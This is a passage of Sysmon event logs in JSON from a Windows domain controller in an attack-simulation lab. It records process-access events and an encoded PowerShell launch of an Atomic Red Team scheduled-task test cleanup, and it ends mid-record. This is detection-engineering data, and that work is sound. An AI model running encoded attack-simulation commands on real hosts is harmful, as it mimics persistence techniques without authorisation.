{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6117,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6118,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6119,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6120,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6121,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6122,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6123,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.542\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11DA-5F25-0000-00109AD20800}\r\nTargetProcessId: 4812\r\nTargetImage: C:\\Windows\\system32\\schtasks.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.542","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11DA-5F25-0000-00109AD20800}","TargetProcessId":"4812","TargetImage":"C:\\Windows\\system32\\schtasks.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6124,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:22.561\r\nProcessGuid: {E2A3D6B1-11DA-5F25-0000-0010D9D30800}\r\nProcessId: 3864\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {Unregister-ScheduledTask -TaskName \\\"\"AtomicTask\\\"\" -confirm:$false >$null 2>&1} \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:22.561","ProcessGuid":"{E2A3D6B1-11DA-5F25-0000-0010D9D30800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {Unregister-ScheduledTask -TaskName \\\"\"AtomicTask\\\"\" -confirm:$false &gt;$null 2&gt;&amp;1} ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand 